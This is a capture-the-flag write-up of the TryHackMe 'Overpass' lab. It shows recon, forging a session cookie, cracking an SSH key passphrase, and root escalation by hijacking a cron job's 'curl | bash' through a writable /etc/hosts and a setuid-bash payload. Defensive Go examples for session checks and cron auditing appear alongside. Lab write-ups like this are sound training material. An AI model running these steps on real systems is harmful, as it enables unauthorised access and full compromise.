TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.
I boot up my AttackBox and machine, the machine in question is
First, I do a preliminary nmap scan:
root@ip-x-x-x-x:~# nmap -sV 10.10.224.184
Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST
Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
MAC Address: 02:D2:A2:85:F6:47 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds
We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:
root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url:            http://10.10.224.184
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/07/09 15:55:52 Starting gobuster
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/downloads (Status: 301)
/img (Status: 301)
/index.html (Status: 301)
2021/07/09 15:55:53 Finished
The admin directory is of interest. Let’s check that out!
We are greeted with an admin login page. I checked the source code to see if there were any comments left in the code but did not see anything. One interesting file with this webpage is the login.js file. It shows us that the form submits to /api/login and then will return statusOrCookie that will be either "Incorrect credentials" or it will be a token that is set using Cookies.set("SessionToken",statusOrCookie). This looks like a promising attack vector.
Another possible route may be SQL injection. I am going to test a common set of passwords like admin:password123 and see if that gives us anything, then try some SQL injection. If all else fails, I want to check to see if we can just set our own SessionToken and grant ourselves access.
SQL Injection did not work, but setting the SessionToken cookie and refreshing so it sends over the headers did work! It provides us with an SSH private key for ‘James’. Also mentions it is crackable. First I am just going to copy the contents and see if we can login with the key alone.
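The cookie result above means the server trusted a value the client can set freely. The following is an added example, not the room's actual server code (which is not shown on this page): weakIsAdmin is a hypothetical reconstruction of that kind of check, and issueToken/strictIsAdmin show the server-side session lookup that closes it. All function names and the sample request are assumptions.

```go
package main

import (
	"crypto/rand"
	"fmt"
	"net/http"
	"sync"
)

var sessions sync.Map // tokens this server issued (token -> username)

// weakIsAdmin (hypothetical flaw): any non-empty SessionToken cookie passes.
func weakIsAdmin(r *http.Request) bool {
	c, err := r.Cookie("SessionToken")
	return err == nil && c.Value != ""
}

// issueToken runs after a successful credential check and returns an
// unguessable 256-bit token that is remembered server-side.
func issueToken(user string) string {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		panic(err) // no entropy: refuse to mint a weak token
	}
	tok := fmt.Sprintf("%x", b)
	sessions.Store(tok, user)
	return tok
}

// strictIsAdmin accepts the cookie only if the server created that session.
func strictIsAdmin(r *http.Request) bool {
	c, err := r.Cookie("SessionToken")
	if err != nil {
		return false
	}
	_, ok := sessions.Load(c.Value)
	return ok
}

// requestWithToken builds a constructed sample request carrying the cookie.
func requestWithToken(tok string) *http.Request {
	r, _ := http.NewRequest("GET", "http://overpass.thm/admin/", nil)
	r.AddCookie(&http.Cookie{Name: "SessionToken", Value: tok})
	return r
}

func main() {
	forged := requestWithToken("anything") // constructed, never issued
	fmt.Println(weakIsAdmin(forged), strictIsAdmin(forged))
}
```

A production version would also expire sessions and set the cookie with HttpOnly, Secure and SameSite attributes.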
I copied the key to ~/.ssh/id_rsa and did a chmod 400 ~/.ssh/id_rsa to set permissions to read only by us, and finally ssh -i ~/.ssh/id_rsa 10.10.224.184 to attempt to login.
Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py – which I don’t know where it is so find + grep will help me out:
root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py"
/opt/john/ssh2john.py
Now we just use python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash to get the hash file.
Next I did a locate rockyou to find the word list and we can use the hash file with a wordlist to crack the passphrase:
root@ip-x-x-x-x:~# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH
Within a few seconds we get the passphrase! Now let’s ssh back in to james’ account.
ssh -i ~/.ssh/id_rsa james@10.10.224.184
And we can cat user.txt for the first flag!
Now we need to privesc to get root permissions.
First, I try running sudo -l to see what commands we can run as sudo, however it immediately asks us for a password that we do not know.
I am going to grab a copy of LinEnum.sh and get it on the machine to run and see what all we have to work with:
# First, we need to get the file on our attack machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Next, start a web server in the dir to transfer the file
python -m "http.server" 3333
# Now, on the target machine, grab the file
wget http://attack-machine-ip:3333/LinEnum.sh
# Set executable
chmod +x LinEnum.sh
# Save the results out
./LinEnum.sh > results.txt
# and let's parse through them
cat results.txt | more
I’m parsing through the results and these items stand out:
- Two admin users of
- Super user account
- Home directory of tryhackme is set to only allow that user to read from it (vs our home directory is readable by all)
- The crontab executes a curl overpass.thm/downloads/src/buildscript.sh | bash as root every minute
  - This is our way in. I ran a cat /etc/hosts and see that overpass.thm just points back to localhost, which means the file is here on the machine.
  - It seems like the files might be in the /root or /tryhackme folders. So we cannot get to those yet.
I went back a little and checked the perms of the hosts file with ls -la /etc/hosts and it shows that everyone is able to read and write to hosts!! So we can create a file on our machine in the directory /downloads/src/buildscript.sh and have it do what we want. The easiest thing is to chmod +s /bin/bash so when we run it, we get root privileges.
So that’s exactly what I did! I started a python web server with python3 -m "http.server" 80 in a directory that had the folder structure of /downloads/src/buildscript.sh. Then I modified the /etc/hosts on the target machine to point overpass.thm to my attack machine’s IP. After a minute, I saw the call come in and it grabbed the file!
Now I just needed to call /bin/bash -p and ran whoami and it said
cat /root/root.txt gives us the final flag.
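The privilege escalation above combines two misconfigurations: a root cron job that pipes fetched content into a shell, and a hosts file any user can edit. The following added example (not part of the original write-up) is a small audit a defender could run over crontab text and the hosts file mode. The function names are assumptions, and the sample input is constructed from the cron entry quoted on this page.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// fetchHost returns the host a cron line pipes into a shell, or "" if none.
func fetchHost(line string) string {
	parts := strings.SplitN(line, "|", 2)
	if len(parts) != 2 || strings.HasPrefix(strings.TrimSpace(line), "#") {
		return ""
	}
	sh := strings.Fields(parts[1])
	if len(sh) == 0 || (sh[0] != "bash" && sh[0] != "sh") {
		return ""
	}
	args := strings.Fields(parts[0])
	for i, a := range args {
		if (a == "curl" || a == "wget") && i+1 < len(args) {
			u := args[len(args)-1] // assumption: the URL is the last argument
			u = strings.TrimPrefix(strings.TrimPrefix(u, "https://"), "http://")
			return strings.SplitN(u, "/", 2)[0]
		}
	}
	return ""
}

// audit flags cron lines that run fetched content; notes a writable hosts file.
func audit(crontab string, hostsMode os.FileMode) []string {
	var findings []string
	for _, line := range strings.Split(crontab, "\n") {
		if host := fetchHost(line); host != "" {
			msg := "cron runs content fetched from " + host
			if hostsMode.Perm()&0002 != 0 {
				msg += "; hosts file is world-writable"
			}
			findings = append(findings, msg)
		}
	}
	return findings
}

func main() {
	// Constructed sample: the cron entry quoted on the page, hosts mode 0666.
	sample := "* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash"
	fmt.Println(audit(sample, 0666))
}
```

On a real host, feed it the contents of /etc/crontab and the mode from os.Stat("/etc/hosts"); the fix is to restore /etc/hosts to 0644 and to stop piping downloads into a root shell.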